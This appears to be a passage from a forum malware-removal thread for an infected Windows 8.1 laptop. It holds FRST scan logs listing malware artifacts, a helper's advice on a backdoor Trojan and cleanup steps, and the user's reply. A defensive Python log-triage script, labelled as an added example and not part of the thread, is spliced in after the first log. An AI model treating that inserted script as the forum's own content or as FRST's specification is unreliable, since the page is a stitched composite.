1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\YuIeaAuVrYQ.exe
2018-03-22 21:50 - 2018-03-22 21:50 - 000481104 _____ (DriverPack) C:\Users\Dan\AppData\Roaming\DRP.exe
2017-03-29 19:14 - 2018-05-31 20:34 - 000000074 _____ () C:\Users\Dan\AppData\Roaming\sp_data.sys
2018-03-22 21:49 - 2018-03-22 21:49 - 000724992 _____ () C:\Users\Dan\AppData\Roaming\virtualexechange.exe
2018-03-22 21:49 - 2018-03-22 21:49 - 000000001 _____ () C:\Users\Dan\AppData\Roaming\w.txt
2015-02-02 09:28 - 2015-02-03 07:25 - 000000068 _____ () C:\Users\Dan\AppData\Roaming\WB.CFG
2015-01-25 12:12 - 2016-03-06 16:31 - 000000365 _____ () C:\Users\Dan\AppData\Roaming\WPLAEHX
2015-04-29 13:39 - 2015-04-29 13:39 - 000200331 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000290 _____ () C:\Users\Dan\AppData\Local\59ED2468_stp.CIS.part
2015-04-29 13:34 - 2015-04-29 13:34 - 000385602 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS
2015-04-29 13:34 - 2015-04-29 13:38 - 000000220 _____ () C:\Users\Dan\AppData\Local\5D515C96_stp.CIS.part
2015-04-29 13:39 - 2015-04-29 13:39 - 000146145 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS
2015-04-29 13:39 - 2015-04-29 13:39 - 000000274 _____ () C:\Users\Dan\AppData\Local\708F4E7A_stp.CIS.part
1623-04-04 13:03 - 1623-04-04 13:03 - 000192512 ____N (Microsoft Corporation) C:\Users\Dan\AppData\Local\agjCu.exe
2015-09-05 13:42 - 2016-04-20 16:08 - 000017920 _____ () C:\Users\Dan\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2018-05-23 21:13 - 2018-05-23 21:13 - 000081134 _____ () C:\Users\Dan\AppData\Local\recently-used.xbel
2018-05-30 22:04 - 2018-05-30 22:04 - 000000077 _____ () C:\Users\Dan\AppData\Local\smplayerhdpi.ini
2018-03-22 21:50 - 2018-03-22 21:50 - 000000003 _____ () C:\Users\Dan\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
C:\Windows\system32\drivers\cooeilos.sys -> Access Denied <======= ATTENTION

LastRegBack: 2018-05-29 22:18

==================== End of FRST.txt ============================

Edited by Oh My!, 02 June 2018 - 08:01 AM.
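
As an added example (not code from the thread, from FRST, or from BleepingComputer), a small Python triage script that parses lines in the FRST.txt format shown above and applies the checks a malware-response analyst makes by eye: the tool's own ATTENTION marker, registry entries whose file is missing ([X]), publisher-less or unsigned binaries, hash-like names, impossible timestamps, and the daily random seven-letter folders under AppData\Local. The regular expressions and heuristics are this example's own assumptions about the format, not a specification published by Farbar; the sample lines mirror entries from the log above.

```python
"""Triage helper for Farbar Recovery Scan Tool (FRST) log lines.

Added example, not part of the forum thread and not FRST's own code.
The regexes below are assumptions about the FRST.txt layout, not a
published specification.
"""
import re

# Sample input in FRST.txt format, mirroring entries from the log above.
SAMPLE = r"""
S2 6320c4d4d9492959f6f8b43b8fdbf2f5; C:\Program Files\6320c4d4d9492959f6f8b43b8fdbf2f5\890117e400ab1707a9d681317614c87e.exe [1795584 2018-03-22] () [File not signed] <==== ATTENTION
R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-08-24] (Adobe Systems Incorporated)
R2 dahhService; C:\ProgramData\dahhService\dahhService.exe [369872 2018-03-22] ()
S4 windowsmanagementservice; windowsmanagementservice [X] <==== ATTENTION
R3 ehkoru; system32\drivers\knruxb.sys [X]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2014-09-21] (Microsoft Corporation)
2018-05-31 20:24 - 2018-05-31 20:24 - 000000000 ____D C:\Users\Dan\AppData\Local\sinxrlt
2018-05-30 20:20 - 2018-05-30 20:20 - 000000000 ____D C:\Users\Dan\AppData\Local\mbiczhw
1623-04-04 13:03 - 1623-04-04 13:03 - 000055808 ____N (Microsoft Corporation) C:\Program Files (x86)\pAuZbg.exe
2018-05-31 20:48 - 2018-05-31 20:49 - 000022194 _____ C:\Users\Dan\Desktop\FRST.txt
""".strip()

# Service/driver line: "R2 name; path [size date] (publisher) [File not signed] <==== ATTENTION"
SERVICE_RE = re.compile(
    r"^[RSU]\d (?P<name>[^;]+); (?P<path>.+?) \[(?P<size>\d+) (?P<date>\d{4}-\d{2}-\d{2})\] "
    r"\((?P<pub>[^)]*)\)(?P<rest>.*)$"
)
# "R3 name; path [X]": the registry entry survives but the file is gone.
MISSING_RE = re.compile(r"^[RSU]\d (?P<name>[^;]+); (?P<path>.+?) \[X\]")
# File line: "created - modified - size attrs (publisher) path"
FILE_RE = re.compile(
    r"^(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - (?P<modified>\d{4}-\d{2}-\d{2} \d{2}:\d{2}) - "
    r"(?P<size>\d{9}) (?P<attr>[_A-Z]{5}) (?:\((?P<pub>[^)]*)\) )?(?P<path>.+)$"
)
HEX32_RE = re.compile(r"^[0-9a-f]{32}$")          # MD5-looking service or file names
RANDOM_DIR_RE = re.compile(r"\\AppData\\Local\\[a-z]{7}$")  # heuristic: 7 random lowercase letters


def flag_line(line, scan_year=2018):
    """Return the reasons (possibly none) a single FRST line deserves a look.

    scan_year is the year the log was produced; anything created after it,
    or before 1990, cannot be a genuine file timestamp.
    """
    reasons = []
    if "<==== ATTENTION" in line:
        reasons.append("FRST attention marker")
    if MISSING_RE.match(line):
        reasons.append("registry entry points at a missing file [X]")
        return reasons
    m = SERVICE_RE.match(line)
    if m:
        # The parenthesised name comes from the file's version resource, so an
        # empty one means no company name at all; the signature check is the
        # separate [File not signed] tag.
        if m["pub"] == "":
            reasons.append("no publisher in version info")
        if "[File not signed]" in m["rest"]:
            reasons.append("file not signed")
        filename = m["path"].rsplit("\\", 1)[-1].rsplit(".", 1)[0]
        if HEX32_RE.match(m["name"]) or HEX32_RE.match(filename):
            reasons.append("hash-like service or file name")
        return reasons
    m = FILE_RE.match(line)
    if m:
        year = int(m["created"][:4])
        if year < 1990 or year > scan_year:
            reasons.append("implausible timestamp " + m["created"][:10])
        # "D" in the attribute column marks a directory.
        if "D" in m["attr"] and RANDOM_DIR_RE.search(m["path"]):
            reasons.append("random seven-letter folder under AppData\\Local")
    return reasons


def triage(log_text, scan_year=2018):
    """Map every flagged line of an FRST log to its reasons, in log order."""
    findings = {}
    for raw in log_text.splitlines():
        line = raw.rstrip()
        reasons = flag_line(line, scan_year)
        if reasons:
            findings[line] = reasons
    return findings


if __name__ == "__main__":
    for flagged, why in triage(SAMPLE).items():
        print(flagged)
        for reason in why:
            print("    -", reason)
```

The heuristics are only a first pass; an entry with no flags (a known vendor path with a signed file) still deserves a hash lookup before it is trusted.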


#8 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • Gender:Male
  • Location:USA

Posted 02 June 2018 - 04:25 PM

Hi Dan,

 

Your computer is severely infected. It will take me some additional time to research all the areas that are impacted.

 

Thank you for your patience.

 

Ray


I don't accept payment for my help, but it would please me if you perform a kindness for your neighbor. You might also contact your local animal shelter. They can always use a bag of kibble or a few cans of pet food. Who knows... you might even find a life-long furry friend there.


#9 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 03 June 2018 - 11:20 AM

Thanks , I'll patiently wait.

We'll get it fixed for sure , this forum has helped me out before.

 

Best ,

Dan



#10 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • Gender:Male
  • Location:USA

Posted 04 June 2018 - 04:12 PM

Hi Dan,

Thank you again for your patience. Since I'm still a trainee, all my posts have to be reviewed by my instructor, Gary, prior to being posted to make sure that you receive the best assistance possible.
 
IMPORTANT: One or more of the identified infections is a backdoor Trojan.

Backdoor Trojans, Botnets, and IRCBots are very dangerous because they compromise system integrity by making changes that allow it to be used by the attacker for malicious purposes. They can disable your anti-virus and security tools to prevent detection and removal. Remote attackers use backdoors as a means of accessing and taking control of a computer that bypasses security mechanisms. This type of exploit allows them to steal sensitive information like passwords, personal and financial data which is then sent back to the hacker. Read Danger: Remote Access Trojans.

You should disconnect the computer from the Internet and from any networked computers until it is cleaned. If your computer was used for online banking, paying bills, has credit card information or other sensitive data on it, all passwords should be changed immediately to include those used for taxes, email, eBay, PayPal and any other online activities. You should consider them to be compromised and change passwords from a clean computer, not the infected one. If not, an attacker may get the new passwords and transaction information. Banking and credit card institutions should be notified immediately of the possible security breach. Failure to notify your financial institution and local law enforcement can result in refusal to reimburse funds lost due to fraud or similar criminal activity. If using a router, you need to reset it with a strong logon/password before connecting again.

Although the infection has been identified and may be removed, your machine has likely been compromised and there is no way to be sure the computer can ever be trusted again. It is dangerous and incorrect to assume the computer is secure even if the malware appears to have been removed. In some instances an infection may have caused so much damage to your system that it cannot be successfully cleaned or repaired. The malware may leave so many remnants behind that security tools cannot find them. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, reformat and reinstall the OS. Please read:

Whenever a system has been compromised by a backdoor payload, it is impossible to know if or how much the backdoor has been used to affect your system...There are only a few ways to return a compromised system to a confident security configuration. These include:

  • Reimaging the system
  • Restoring the entire system using a full system backup from before the backdoor infection
  • Reformatting and reinstalling the system

Backdoors and What They Mean to You

This is what Jesper M. Johansson, Security Program Manager at Microsoft TechNet has to say: Help: I Got Hacked. Now What Do I Do?.

The only way to clean a compromised system is to flatten and rebuild. That's right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications).

Please let me know whether you want to try to clean this PC or will reformat your hard drive and reset your router. Please also consider that Microsoft's end of mainstream support for Windows 8.1 was on January 9, 2018. Extended support ends on January 10, 2023. Windows 10 is faster and much more secure than Windows 8.1. Check Windows 10 Specifications & Systems Requirements to see whether your hardware will support Windows 10. Here's a brief excerpt:
 

Processor: 1 gigahertz (GHz) or faster processor or SoC
RAM: 1 gigabyte (GB) for 32-bit or 2 GB for 64-bit
Hard disk space: 16 GB for 32-bit OS; 20 GB for 64-bit OS
Graphics card: DirectX 9 or later with WDDM 1.0 driver
Display: 800x600

Read the whole article for important notes.

 

Note that the retail price for Win10 Home is $119 and Win10 Pro is $199.

Assuming you want to fix this machine
I am assuming you will want to fix this machine while it is still running Windows 8.1. In that case, I have prepared a script to be run using Farbar's Recovery Scan Tool (FRST). Before you run the tool, please uninstall FrostWire or agree to refrain from using it while we are working together. Then uninstall SearchAwesome (this is not optional). Follow that by running FRST to process the attached script. And, finally, please get me a new set of FRST logs. Use your thumb drive to transfer files between your clean PC and the sick laptop.

 

Preliminary question
Have you tried connecting to the internet via Ethernet cable to your router?


Peer-to-Peer File Sharing Warning

Going over your logs, I noticed that you have FrostWire installed.

  • Avoid gaming sites, pirated software, cracking tools, keygens, and peer-to-peer (P2P) file sharing programs.
  • They are a security risk which can make your computer susceptible to a wide variety of malware infections, remote attacks, exposure of personal information, and identity theft. Many malicious worms and trojans spread across P2P file sharing networks, gaming, and underground sites.
  • Users visiting such pages may see innocuous-looking banner ads containing code which can trigger pop-up ads and malicious Flash ads that install viruses, trojans and spyware. Ads are a target for hackers because they offer a stealthy way to distribute malware to a wide range of Internet users.
  • The best way to reduce the risk of infection is to avoid these types of web sites and not use any P2P applications.

See quietman7's warning about P2P here.

It is pretty much certain that if you continue to use P2P programs, you will get re-infected.
I strongly recommend that you uninstall all peer-to-peer file sharing programs; however, that choice is up to you. To remove these programs, see the Uninstall programs instructions below.

If you wish to keep it, please do not use it until your computer is cleaned.

Please let me know whether you will refrain from using FrostWire or will uninstall it.

Uninstall programs

  • Open Control Panel and find the list of installed programs displayed in the Programs and Features section.
  • Uninstall the following by right-clicking on the programs below (and any other similar names) and selecting Remove or Uninstall and clicking Yes for each program one at a time.

SearchAwesome

FrostWire

  • Take note of any error messages for each program to be uninstalled.
  • Reboot your laptop.

 

Run Farbar Recovery Scan Tool (FRST) in FIX mode

  • Download the attached Fixlist.txt file onto a thumb drive and transfer it to the desktop on the sick PC. Note: it must be placed into the same location as FRST64.exe which is already on your desktop.
  • Double-click FRST64.exe which is already on your desktop to open the Farbar Recovery Scan Tool window.
  • Click the Fix button in the Farbar Recovery Scan Tool window.
  • Wait until the program completes execution.
  • The tool will create a log called Fixlog.txt. Please post its contents into your reply.

NOTICE: This script was written specifically for this user to be used on this particular machine. Running this script on another machine may cause damage to your operating system.

 

Re-scan with Farbar Recovery Scan Tool

  • Right-click FRST64.exe then click Run as administrator.
  • When the tool opens, click Yes to disclaimer.
  • Under Optional Scan, be sure a checkmark is placed next to Addition.txt.
  • Click Scan.
  • When finished, it will produce logs called FRST.txt and Addition.txt in the same directory where the tool was run from.
  • Please copy and paste both logs into your next reply.

 

In your next reply...

  • Please confirm whether you want to fix Windows 8.1 rather than upgrade to Windows 10.
  • Did you uninstall FrostWire or are you agreeing to refrain from using it?
  • Did you try to connect to the router via Ethernet cable? Did you reach the internet that way?
  • Did you uninstall SearchAwesome?
  • Copy and paste the entire contents of Fixlog.txt into the body of your message. Copy directly from Notepad without double-spacing or doing any other alterations.
  • Copy and paste the entire contents of FRST.txt and Addition.txt into the body of your message. Copy directly from Notepad without double-spacing or doing any other alterations.
  • How is your laptop running now?

Thank you,

 

Ray

 

Note: The FRST script will be attached to my second of two consecutive posts.


Edited by RayS, 04 June 2018 - 04:26 PM.



#11 RayS

RayS

  • Malware Response Team
  • 2,414 posts
  • Gender:Male
  • Location:USA

Posted 04 June 2018 - 04:24 PM

Hi Dan,

 

Here's the FRST script attached.

 

 

Be sure you transfer this file (Fixlist.txt) onto the desktop of your sick laptop.

 

Thank you,

 

Ray




#12 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 04 June 2018 - 06:25 PM

Hi Ray ,

This is Dan.

 

Ok , I'll get on it tonight.

There will be a 1 day delay for each reply because I'm using another computer to talk to you.

 

I stopped using FrostWire a long time ago because it didn't work for me,

so I'll uninstall FrostWire and SearchAwesome and follow your directions with the scan and txt logs.

I know that SearchAwesome came onto my computer on the same date, I believe, as when I got the virus, from what I remember seeing in the program listings.

 

Best ,

Dan



#13 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • Gender:Male
  • Location:Bronx New York

Posted 05 June 2018 - 11:23 AM

Hello Ray , 

Here is my reply to your questions, and I'm also copying and pasting the Addition, Fixlog & FRST text.

 

 

Please confirm whether you want to fix Windows 8.1 rather than upgrade to Windows 10.

 

Reply - I want to fix Windows 8.1

 

Did you uninstall FrostWire or are you agreeing to refrain from using it?

 

Reply - I uninstalled FrostWire, but SearchAwesome couldn't be uninstalled; every time I right-click uninstall it just does nothing and it is still on the computer even after I reboot. I used to have the Revo Uninstaller free trial program and that would work for sure on other stuff, but I don't have it anymore; you'll have to supply a program or solution to get around this.

 

Did you try to connect to the router via Ethernet cable?

 

Reply - I always used Wi-Fi on this laptop. Even though all the Wi-Fi signals are running, I still can't connect; the yellow sign (!) over the internet connection menu is still there and access is still blocked. I did try connecting with an Ethernet cable and that doesn't work either; it's blocked.

 

Did you reach the internet that way?

 

Reply - No

 

Did you uninstall SearchAwesome?

 

Reply - Same answer, no, it won't uninstall.

 

Here's the Frst.txt

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 16.05.2018 01

Ran by Dan (administrator) on BEATLES (04-06-2018 21:04:52)

Running from C:\Users\Dan\Desktop

Loaded Profiles: Dan (Available Profiles: Dan)

Platform: Windows 8.1 Connected (Update) (X64) Language: English (United States)

Internet Explorer Version 11 (Default browser: IE)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(TOSHIBA CORPORATION) C:\Windows\System32\avmhengsvc.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Microsoft Corporation) C:\Windows\SysWOW64\rundll32.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe

(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSWinService.exe

(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe

() C:\ProgramData\dahhService\dahhService.exe

(ASUSTeK Computer Inc.) C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe

(ASUS) C:\Program Files (x86)\ASUS\Splendid\ACMON.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLoader.exe

() C:\Program Files\Gramblr\gramblr.exe

(Intel® Corporation) C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe

(www.shadowexplorer.com) C:\Program File (x86) ShadowExplorer\ShadowExplorer\sesvc.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnat.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe

(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe

() C:\Users\Dan\AppData\Local\aucozre\aucozre.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

() C:\Users\Dan\AppData\Local\aucozre\nvhuamg.exe

(VMware, Inc.) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe

(VMware, Inc.) C:\Windows\SysWOW64\vmnetdhcp.exe

(Intel Corporation) C:\Windows\System32\igfxtray.exe

(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\IPC\AdobeIPCBroker.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ADS\Adobe Desktop Service.exe

() C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\CCXProcess.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(Node.js) C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\libs\node.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\HEX\Adobe CEF Helper.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPCenter.exe

(Waves Audio Ltd.) C:\Program Files\Realtek\Audio\HDA\MaxxAudioControl64.exe

(Microsoft Corporation) C:\Program Files\Windows NT\Accessories\wordpad.exe

(ASUS Cloud Corporation) C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\AsusWSPanel.exe

(AsusTek) C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPHelper.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

 

==================== Registry (Whitelisted) ===========================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10}] => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [1610936 2016-07-10] (COMODO)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-07-01] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [WebStorage] => C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSLoader.exe [63296 2014-02-25] ()

HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [95192 2013-03-08] (CyberLink Corp.)

HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [1980416 2013-12-18] (Wondershare)

HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-04-21] (Apple Inc.)

HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime Alternative\QTTask.exe [421888 2013-05-01] (Apple Inc.)

HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2383040 2016-08-24] (Adobe Systems Incorporated)

HKLM-x32\...\Run: [chrome] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [1589592 2018-03-20] (Google Inc.)

Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)

HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1

HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [xdm] => C:\Users\Dan\AppData\Local\XDM\xdm.exe [782848 2014-11-15] (Subhra Das Gupta)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8641240 2016-02-12] (Piriform Ltd)

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca0a9-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MountPoints2: {536ca102-5ee7-11e8-8342-10c37bbb446b} - "D:\windows\AutoRun.exe"

AppInit_DLLs-x32: C:\ProgramData\TeamVieverService.dll => C:\ProgramData\TeamVieverService.dll [267264 2018-03-23] ()

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HandyAndy.lnk [2016-05-16]

ShortcutTarget: HandyAndy.lnk -> C:\Program Files\Andy\HandyAndy.exe ()

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyEnable: [.DEFAULT] => Proxy is enabled.

ProxyServer: [.DEFAULT] => http=127.0.0.1:61746;https=127.0.0.1:61746

ProxyEnable: [S-1-5-21-1066246007-1091995785-1061003623-1001] => Proxy is enabled.

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt

Tcpip\..\Interfaces\{4BFECB1F-C4F4-478B-9423-CF38BB3D1339}: [DhcpNameServer] 167.206.112.3 167.206.112.4

Tcpip\..\Interfaces\{ADE3F806-57EF-4246-85D9-1A41A1425F70}: [DhcpNameServer] 208.67.222.222 208.67.220.220

 

Internet Explorer:

==================

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =

HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =

HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-07] (Oracle Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-07] (Oracle Corporation)

 

FireFox:

========

FF DefaultProfile: jefccanc.Daniel-1506042165545

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default [2018-05-29]

FF Extension: (Avira Browser Safety) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\abs@avira.com.xpi [2017-06-17]

FF Extension: (Quick Searcher) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\mefhakmgclhhfbdadeojlkbllmecialg@chrome-store-foxified-1132576233 [2018-03-22]

FF Extension: (Video DownloadHelper) - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\i1ijieam.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2017-05-31] [Legacy]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\uxz090y6.default-1505963547810 [2018-05-29]

FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\jefccanc.Daniel-1506042165545 [2018-05-29]

FF HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\Firefox\Extensions: [xdmff@xdman.sourceforge.net] - C:\Users\Dan\AppData\Local\XDM\xdmff

FF Extension: (XDM Helper) - C:\Users\Dan\AppData\Local\XDM\xdmff [2016-04-03] [Legacy] [not signed]

FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-08-24] (Adobe Systems)

FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-07] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-04-01] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.7\npGoogleUpdate3.dll [2017-11-15] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program File (x86) VLC Media Player VideoLan\VLC\npvlc.dll [2016-06-01] (VideoLAN)

FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [No File]

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-02-11] (Adobe Systems Inc.)

FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-08-24] (Adobe Systems)

FF Plugin HKU\S-1-5-21-1066246007-1091995785-1061003623-1001: signiant.com/SigniantTransfer -> C:\Users\Dan\AppData\Roaming\SigniantInc\SigniantTransfer\5.4.4.71844\npSigniantTransfer.dll [2015-07-09] (Signiant Inc.)

 

Chrome:

=======

